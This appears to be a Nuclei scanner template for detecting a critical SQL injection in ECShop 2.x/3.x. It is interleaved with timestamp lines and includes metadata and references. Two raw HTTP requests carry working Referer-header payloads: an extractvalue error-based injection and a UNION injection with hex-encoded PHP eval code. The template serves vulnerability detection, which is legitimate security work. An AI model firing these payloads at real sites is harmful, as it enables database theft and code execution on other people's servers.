2021-11-08 08:12:13 +00:00
id : ecshop-sqli
2021-11-07 02:03:09 +00:00
info :
2022-09-29 13:38:41 +00:00
name : ECShop 2.x/3.x - SQL Injection
2022-05-18 09:20:12 +00:00
author : Lark-lab,ImNightmaree,ritikchaddha
2022-09-29 13:38:41 +00:00
severity : critical
2022-05-23 10:43:10 +00:00
description : |
2022-09-29 13:38:41 +00:00
ECShop 2.x and 3.x contains a SQL injection vulnerability which can allow an attacker to inject arbitrary SQL statements via the referer header field and the dangerous eval function, thus possibly allowing an attacker to obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
2021-11-08 08:12:13 +00:00
reference :
- https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a
- https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
2022-05-18 09:20:12 +00:00
- http://www.wins21.com/mobile/blog/blog_view.html?num=1172
2022-05-18 09:36:50 +00:00
- https://www.shutingrz.com/post/ad_hack-ec_exploit/
2022-09-29 13:38:41 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2023-10-14 11:27:55 +00:00
cvss-score : 10
2022-09-29 13:38:41 +00:00
cwe-id : CWE-89
2024-09-10 08:22:50 +00:00
cpe : cpe:2.3:a:shopex:ecshop:*:*:*:*:*:*:*:*
2022-05-23 10:43:10 +00:00
metadata :
verified : true
2023-10-14 11:27:55 +00:00
max-request : 2
2022-05-23 10:43:10 +00:00
fofa-query : app="ECShop"
2024-09-10 08:22:50 +00:00
product : ecshop
vendor : shopex
2021-11-08 10:15:54 +00:00
tags : sqli,php,ecshop
2021-11-07 02:03:09 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-11-07 02:03:09 +00:00
- raw :
2021-11-07 02:36:28 +00:00
- |
2021-11-08 08:12:13 +00:00
GET /user.php?act=login HTTP/1.1
2021-11-07 02:03:09 +00:00
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
Referer : 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}
2023-12-21 07:30:00 +00:00
2022-05-18 09:20:12 +00:00
- |
GET /user.php?act=login HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2022-05-23 10:43:10 +00:00
Referer : 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
2021-11-07 02:03:09 +00:00
2022-05-23 10:43:10 +00:00
stop-at-first-match : true
2021-11-07 02:03:09 +00:00
matchers :
- type : word
words :
2021-11-08 08:12:13 +00:00
- '[error] =>'
- '[0] => Array'
- 'MySQL server error report:Array'
2021-11-07 02:39:21 +00:00
condition : and
2024-09-12 05:14:01 +00:00
# digest: 4a0a0047304502206ae19ddacb5cd0a11d11d3cb8793d7121c5d0d7f5c8ad8ceea78984d1e3d21af022100ea16e46aa1a4b2e740c7bf702abeb7d45a7084a89415042de640ee29a07f7d0c:922c64590222798bb761d5b6d8e72950